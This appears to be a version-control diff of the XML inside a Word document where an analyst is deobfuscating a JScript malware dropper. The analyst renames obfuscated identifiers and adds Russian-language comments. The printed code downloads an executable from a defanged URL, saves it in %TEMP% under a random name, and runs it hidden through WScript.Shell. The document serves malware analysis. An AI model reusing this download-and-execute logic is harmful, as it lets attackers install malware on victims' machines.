     <w:name w:val="toc 8"/>
-    <w:basedOn w:val="665"/>
-    <w:next w:val="665"/>
+    <w:basedOn w:val="893"/>
+    <w:next w:val="893"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -31450,10 +31632,10 @@
       <w:ind w:left="1540"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="196">
+  <w:style w:type="paragraph" w:styleId="890">
     <w:name w:val="toc 9"/>
-    <w:basedOn w:val="665"/>
-    <w:next w:val="665"/>
+    <w:basedOn w:val="893"/>
+    <w:next w:val="893"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -31462,7 +31644,7 @@
       <w:ind w:left="1760"/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="206">
+  <w:style w:type="paragraph" w:styleId="891">
     <w:name w:val="TOC Heading"/>
     <w:uiPriority w:val="39"/>
     <w:unhideWhenUsed/>
@@ -31472,10 +31654,10 @@
       <w:ind/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="207">
+  <w:style w:type="paragraph" w:styleId="892">
     <w:name w:val="table of figures"/>
-    <w:basedOn w:val="665"/>
-    <w:next w:val="665"/>
+    <w:basedOn w:val="893"/>
+    <w:next w:val="893"/>
     <w:uiPriority w:val="99"/>
     <w:unhideWhenUsed/>
     <w:pPr>
@@ -31484,7 +31666,7 @@
       <w:ind/>
     </w:pPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="665" w:default="1">
+  <w:style w:type="paragraph" w:styleId="893" w:default="1">
     <w:name w:val="Normal"/>
     <w:pPr>
       <w:pBdr/>
@@ -31492,7 +31674,7 @@
       <w:ind/>
     </w:pPr>
   </w:style>
-  <w:style w:type="table" w:styleId="666">
+  <w:style w:type="table" w:styleId="894">
     <w:name w:val="Table Normal"/>
     <w:pPr>
       <w:pBdr/>
@@ -31675,10 +31857,10 @@
       </w:tcPr>
     </w:tblStylePr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="667">
+  <w:style w:type="paragraph" w:styleId="895">
     <w:name w:val="Heading 1"/>
-    <w:basedOn w:val="665"/>
-    <w:next w:val="665"/>
+    <w:basedOn w:val="893"/>
+    <w:next w:val="893"/>
     <w:pPr>
       <w:keepNext w:val="true"/>
       <w:keepLines w:val="true"/>
@@ -31693,10 +31875,10 @@
       <w:szCs w:val="48"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="668">
+  <w:style w:type="paragraph" w:styleId="896">
     <w:name w:val="Heading 2"/>
-    <w:basedOn w:val="665"/>
-    <w:next w:val="665"/>
+    <w:basedOn w:val="893"/>
+    <w:next w:val="893"/>
     <w:pPr>
       <w:keepNext w:val="true"/>
       <w:keepLines w:val="true"/>
@@ -31711,10 +31893,10 @@
       <w:szCs w:val="36"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="669">
+  <w:style w:type="paragraph" w:styleId="897">
     <w:name w:val="Heading 3"/>
-    <w:basedOn w:val="665"/>
-    <w:next w:val="665"/>
+    <w:basedOn w:val="893"/>
+    <w:next w:val="893"/>
     <w:pPr>
       <w:keepNext w:val="true"/>
       <w:keepLines w:val="true"/>
@@ -31729,10 +31911,10 @@
       <w:szCs w:val="28"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="670">
+  <w:style w:type="paragraph" w:styleId="898">
     <w:name w:val="Heading 4"/>
-    <w:basedOn w:val="665"/>
-    <w:next w:val="665"/>
+    <w:basedOn w:val="893"/>
+    <w:next w:val="893"/>
     <w:pPr>
       <w:keepNext w:val="true"/>
       <w:keepLines w:val="true"/>
@@ -31747,10 +31929,10 @@
       <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="671">
+  <w:style w:type="paragraph" w:styleId="899">
     <w:name w:val="Heading 5"/>
-    <w:basedOn w:val="665"/>
-    <w:next w:val="665"/>
+    <w:basedOn w:val="893"/>
+    <w:next w:val="893"/>
     <w:pPr>
       <w:keepNext w:val="true"/>
       <w:keepLines w:val="true"/>
@@ -31765,10 +31947,10 @@
       <w:szCs w:val="22"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="672">
+  <w:style w:type="paragraph" w:styleId="900">
     <w:name w:val="Heading 6"/>
-    <w:basedOn w:val="665"/>
-    <w:next w:val="665"/>
+    <w:basedOn w:val="893"/>
+    <w:next w:val="893"/>
     <w:pPr>
       <w:keepNext w:val="true"/>
       <w:keepLines w:val="true"/>
@@ -31783,10 +31965,10 @@
       <w:szCs w:val="20"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="673">
+  <w:style w:type="paragraph" w:styleId="901">
     <w:name w:val="Title"/>
-    <w:basedOn w:val="665"/>
-    <w:next w:val="665"/>
+    <w:basedOn w:val="893"/>
+    <w:next w:val="893"/>
     <w:pPr>
       <w:keepNext w:val="true"/>
       <w:keepLines w:val="true"/>
@@ -31801,10 +31983,10 @@
       <w:szCs w:val="72"/>
     </w:rPr>
   </w:style>
-  <w:style w:type="paragraph" w:styleId="674">
+  <w:style w:type="paragraph" w:styleId="902">
     <w:name w:val="Subtitle"/>
-    <w:basedOn w:val="665"/>
-    <w:next w:val="665"/>
+    <w:basedOn w:val="893"/>
+    <w:next w:val="893"/>
     <w:pPr>
       <w:keepNext w:val="true"/>
       <w:keepLines w:val="true"/>

</xml_diff>

<commit_message>
1st Attempf of Deobfuscation
</commit_message>
<xml_diff>
--- a/Malware_JavaScript_Dropper.docx
+++ b/Malware_JavaScript_Dropper.docx
@@ -2,22 +2,6 @@
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
 <w:document xmlns:wpc="http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wpg="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup" xmlns:wpi="http://schemas.microsoft.com/office/word/2010/wordprocessingInk" xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml" xmlns:wps="http://schemas.microsoft.com/office/word/2010/wordprocessingShape" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:wp14="http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing" xmlns:w14="http://schemas.microsoft.com/office/word/2010/wordml" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" xmlns:w16cex="http://schemas.microsoft.com/office/word/2018/wordml/cex" xmlns:w16cid="http://schemas.microsoft.com/office/word/2016/wordml/cid" xmlns:w16="http://schemas.microsoft.com/office/word/2018/wordml" xmlns:w16sdtdh="http://schemas.microsoft.com/office/word/2020/wordml/sdtdatahash" xmlns:w16se="http://schemas.microsoft.com/office/word/2015/wordml/symex" mc:Ignorable="w14 w15 w16se w16cid w16 w16cex w16sdtdh wp14">
   <w:body>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="false"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">var _0x22fa1f = _initial_launchFunc;</w:t>
-      </w:r>
-      <w:r/>
-    </w:p>
     <w:p>
       <w:pPr>
         <w:widowControl w:val="false"/>
@@ -33,22 +17,12 @@
         <w:t xml:space="preserve">(function(_0x4f7733, _0x9ac3d3) {</w:t>
       </w:r>
       <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="false"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:tab/>
-        <w:t xml:space="preserve">var _0x364b15 = _initial_launchFunc,</w:t>
       </w:r>
+      <w:r/>
       <w:r/>
     </w:p>
     <w:p>
@@ -56,15 +30,13 @@
         <w:widowControl w:val="false"/>
         <w:pBdr/>
         <w:spacing/>
-        <w:ind/>
+        <w:ind w:firstLine="720"/>
         <w:rPr/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-        <w:tab/>
         <w:t xml:space="preserve">_0x54d738 = _0x4f7733();</w:t>
       </w:r>
       <w:r/>
@@ -118,13 +90,25 @@
         </w:rPr>
         <w:t xml:space="preserve">        </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">var _0x3db72c = parseInt(_0x364b15(495)) / 1 * (parseInt(_0x364b15(485)) / 0x2) + parseInt(_0x364b15(499)) / 3 * (parseInt(_0x364b15(505)) / 4) + -parseInt(_0x364b15(496)) / 5 * (parseInt(_0x364b15(500)) / 6) </w:t>
+        <w:t xml:space="preserve">var _0x3db72c = parseInt(__GetArrayElement_ByIn</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">+ parseInt(_0x364b15(502)) / 7 * (-parseInt(_0x364b15(489)) / 8) + -parseInt(_0x364b15(503)) / 9 * (-parseInt(_0x364b15(493)) / 10) + -parseInt(_0x364b15(515)) / 11 + -parseInt(_0x364b15(488)) / 12 * (parseInt(_0x364b15(512)) / 13);</w:t>
+        <w:t xml:space="preserve">dex(495)) / 1 * (parseInt(__GetArrayElement_ByIndex(485)) / 2) + parseInt(__GetArrayElement_ByIndex(499)) / 3 * (parseInt(__GetArrayElement_ByIndex(505)) / 4) + -parseInt(__GetArrayElement_ByIndex(496)) / 5 * (parseInt(__GetArrayElement_ByIndex(500)) / 6) </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">+ parseInt(__GetArrayElement_ByIndex(502)) / 7 * (-parseInt(__GetArrayElement_ByIndex(48</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">9)) / 8) + -parseInt(__GetArrayElement_ByIndex(503)) / 9 * (-parseInt(__GetArrayElement_ByIndex(493)) / 10) + -parseInt(__GetArrayElement_ByIndex(515)) / 11 + -parseInt(__GetArrayElement_ByIndex(488)) / 12 * (parseInt(__GetArrayElement_ByIndex(512)) / 13);</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -247,7 +231,19 @@
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">}(_StoreMaliciousCommands, 0x7bbe1));</w:t>
+        <w:t xml:space="preserve">}(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">__StoreMaliciousCommands</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, 0x7bbe1));</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -268,6 +264,28 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext w:val="false"/>
+        <w:keepLines w:val="false"/>
+        <w:pageBreakBefore w:val="false"/>
+        <w:widowControl w:val="false"/>
+        <w:pBdr>
+          <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r/>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:widowControl w:val="false"/>
         <w:pBdr/>
         <w:spacing/>
@@ -278,7 +296,7 @@
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">function _StoreMaliciousCommands() {</w:t>
+        <w:t xml:space="preserve">function __StoreMaliciousCommands() {</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -289,25 +307,44 @@
         <w:spacing/>
         <w:ind/>
         <w:rPr>
-          <w:highlight w:val="none"/>
+          <w:lang w:val="ru-RU"/>
         </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rtl w:val="0"/>
+          <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:tab/>
-        <w:t xml:space="preserve">var _0x44cf17 = ['161388RPSeXo', '%TEMP%', '.exe', '492TCvoTF', '10472DzuRbO', 'MSXML2.XMLHTTP', 'Scripting.FileSystemObject', 'open', '2591450LelUFW', 'Open', '11DdyEIT', '143705KPLLVg', 'P</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rtl w:val="0"/>
+          <w:lang w:val="ru-RU"/>
         </w:rPr>
-        <w:t xml:space="preserve">osition', 'CreateObject', '811974EpasyL', '12YWhdLu', 'ExpandEnvironmentStrings', '161niwgeO', '9momQLi', 'send', '4jtkQWe', 'WScript.Shell', 'substring', 'Close', 'random', 'Write', 'ResponseBody', '70239FHGPwr', 'status', 'Type', '6616236zGcHfF', 'Run'];</w:t>
+        <w:t xml:space="preserve">v</w:t>
       </w:r>
       <w:r>
         <w:rPr>
-          <w:highlight w:val="none"/>
+          <w:rtl w:val="0"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">ar _0x44cf17 = ['161388RPSeXo', '%TEMP%', '.exe', '492TCvoTF', '10472DzuRbO', 'MSXML2.XMLHTTP', 'Scripting.FileSystemObject', 'open', '2591450LelUFW', 'Open', '11DdyEIT', '143705KPLLVg', 'Position', 'CreateObject', '811974EpasyL', '12YWhdLu', 'ExpandEnviro</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+        <w:t xml:space="preserve">nmentStrings', '161niwgeO', '9momQLi', 'send', '4jtkQWe', 'WScript.Shell', 'substring', 'Close', 'random', 'Write', 'ResponseBody', '70239FHGPwr', 'status', 'Type', '6616236zGcHfF', 'Run'];</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
+        </w:rPr>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="ru-RU"/>
         </w:rPr>
       </w:r>
     </w:p>
@@ -320,7 +357,6 @@
         <w:rPr/>
       </w:pPr>
       <w:r>
-        <w:tab/>
         <w:t xml:space="preserve">return </w:t>
       </w:r>
       <w:r>
@@ -337,194 +373,6 @@
         <w:pBdr/>
         <w:spacing/>
         <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-        <w:t xml:space="preserve">/* </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="false"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">False Invoke </w:t>
-      </w:r>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="false"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">Ложный вызов </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">(</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:lang w:val="ru-RU"/>
-        </w:rPr>
-        <w:t xml:space="preserve">поддельная вложенность</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">)</w:t>
-      </w:r>
-      <w:r/>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="false"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-        <w:t xml:space="preserve">*/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:highlight w:val="none"/>
-          <w:lang w:val="en-US"/>
-        </w:rPr>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="false"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t xml:space="preserve">_StoreMaliciousCommands = function() {</w:t>
-      </w:r>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="false"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:t xml:space="preserve">    </w:t>
-        <w:tab/>
-        <w:t xml:space="preserve">return _0x44cf17;</w:t>
-      </w:r>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="false"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t xml:space="preserve">};</w:t>
-      </w:r>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="false"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
-        <w:rPr/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rtl w:val="0"/>
-        </w:rPr>
-        <w:tab/>
-        <w:t xml:space="preserve">return _StoreMaliciousCommands();</w:t>
-      </w:r>
-      <w:r/>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl w:val="false"/>
-        <w:pBdr/>
-        <w:spacing/>
-        <w:ind/>
         <w:rPr/>
       </w:pPr>
       <w:r>
@@ -537,6 +385,32 @@
     </w:p>
     <w:p>
       <w:pPr>
+        <w:keepNext w:val="false"/>
+        <w:keepLines w:val="false"/>
+        <w:pageBreakBefore w:val="false"/>
+        <w:widowControl w:val="false"/>
+        <w:pBdr>
+          <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:bottom w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:right w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:between w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+        </w:pBdr>
+        <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
+        <w:spacing w:after="0" w:before="0" w:line="276" w:lineRule="auto"/>
+        <w:ind w:right="0" w:firstLine="0" w:left="0"/>
+        <w:jc w:val="left"/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:highlight w:val="none"/>
+        </w:rPr>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:widowControl w:val="false"/>
         <w:pBdr/>
         <w:spacing/>
@@ -562,7 +436,36 @@
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">function _initial_launchFunc(_0x2cd2a4, _0x105e15) {</w:t>
+      </w:r>
+      <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl w:val="false"/>
+        <w:pBdr/>
+        <w:spacing/>
+        <w:ind/>
+        <w:rPr/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">function </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
+          <w:color w:val="000000"/>
+          <w:sz w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">__GetArrayElement_ByIndex</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">(_0x2cd2a4, _0x105e15) {</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -579,7 +482,19 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">var _StoreMaliciousCommandse9 = _StoreMaliciousCommands();</w:t>
+        <w:t xml:space="preserve">var arr_MaliciousCommand = </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">__StoreMaliciousCommands</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">();</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -596,7 +511,19 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">return _initial_launchFunc = function(_initial_launchFunc***ec, _0x3f4979) {</w:t>
+        <w:t xml:space="preserve">return _initial_launchFunc = function(</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">one_index</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">) {</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -614,7 +541,17 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">_initial_launchFuncec = _initial_launchFunc***ec - 485;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">var new_index = one_index - 485;</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
       </w:r>
       <w:r/>
     </w:p>
@@ -632,7 +569,17 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">var _0x5d8691 = _StoreMaliciousCommandse9[_initial_launchFunc***ec];</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">var _0x5d8691 =  arr_MaliciousCommand[new_index];</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
       </w:r>
       <w:r/>
     </w:p>
@@ -716,7 +663,7 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">var shell = WScript['CreateObject'](_0x22fa1f(</w:t>
+        <w:t xml:space="preserve">var shell = WScript['CreateObject'](__initial_launchFunc_val(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -746,7 +693,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">fso = WScript[_0x22fa1f(498)](_0x22fa1f(</w:t>
+        <w:t xml:space="preserve">fso = WScript[__initial_launchFunc_val(498)](__initial_launchFunc_val(</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -776,7 +723,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">tempFolder = shell[_0x22fa1f(501)](_0x22fa1f(486)),</w:t>
+        <w:t xml:space="preserve">tempFolder = shell[__initial_launchFunc_val(501)](__initial_launchFunc_val(486)),</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -794,7 +741,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">randomName = Math[_0x22fa1f(509)]()['toString'](36)[_0x22fa1f(507)](2, 10) + _0x22fa1f(487),</w:t>
+        <w:t xml:space="preserve">randomName = Math[__initial_launchFunc_val(509)]()['toString'](36)[__initial_launchFunc_val(507)](2, 10) + __initial_launchFunc_val(487),</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -830,7 +777,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">fileUrl = 'https://u[.</w:t>
+        <w:t xml:space="preserve">fileUrl = 'hxxp://u[.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -854,7 +801,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">xhr = WScript[_0x22fa1f(498)](_0x22fa1f(490));</w:t>
+        <w:t xml:space="preserve">xhr = WScript[__initial_launchFunc_val(498)](__initial_launchFunc_val(490));</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -871,7 +818,7 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">xhr[_0x22fa1f(492)]('GET', fileUrl, ![]), xhr[_0x22fa1f(504)]();</w:t>
+        <w:t xml:space="preserve">xhr[__initial_launchFunc_val(492)]('GET', fileUrl, ![]), xhr[__initial_launchFunc_val(504)]();</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -888,7 +835,7 @@
           <w:rtl w:val="0"/>
         </w:rPr>
         <w:tab/>
-        <w:t xml:space="preserve">if (xhr[_0x22fa1f(513)] === 200) {</w:t>
+        <w:t xml:space="preserve">if (xhr[__initial_launchFunc_val(513)] === 200) {</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -906,7 +853,7 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">var stream = WScript[_0x22fa1f(498)]('ADODB.Stream');</w:t>
+        <w:t xml:space="preserve">var stream = WScript[__initial_launchFunc_val(498)]('ADODB.Stream');</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -924,13 +871,19 @@
         </w:rPr>
         <w:t xml:space="preserve">    </w:t>
         <w:tab/>
-        <w:t xml:space="preserve">stream[_0x22</w:t>
+        <w:t xml:space="preserve">stream[__initial_launchFunc_val</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rtl w:val="0"/>
         </w:rPr>
-        <w:t xml:space="preserve">fa1f(494)](), stream[_0x22fa1f(514)] = 0x1, stream[_0x22fa1f(510)](xhr[_0x22fa1f(511)]), stream[_0x22fa1f(497)] = 0x0, stream['SaveToFile'](filePath, 2), stream[_0x22fa1f(508)](), shell[_0x22fa1f(516)]('”' + filePath + '”', 0, ![]);</w:t>
+        <w:t xml:space="preserve">(494)](), stream[__initial_launchFunc_val(514)] = 0x1, strea</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rtl w:val="0"/>
+        </w:rPr>
+        <w:t xml:space="preserve">m[__initial_launchFunc_val(510)](xhr[__initial_launchFunc_val(511)]), stream[__initial_launchFunc_val(497)] = 0, stream['SaveToFile'](filePath, 2), stream[__initial_launchFunc_val(508)](), shell[__initial_launchFunc_val(516)]('”' + filePath + '”', 0, ![]);</w:t>
       </w:r>
       <w:r/>
     </w:p>
@@ -950,6 +903,44 @@
         <w:t xml:space="preserve">}</w:t>
       </w:r>
       <w:r/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:keepNext w:val="false"/>
+        <w:keepLines w:val="false"/>
+        <w:pageBreakBefore w:val="false"/>
+        <w:widowControl w:val="false"/>
+        <w:pBdr>
+          <w:top w:val="none" w:color="000000" w:sz="0" w:space="0"/>
+          <w:left w:val="none" w:color="000000" w:sz="0" w:space="0"/>
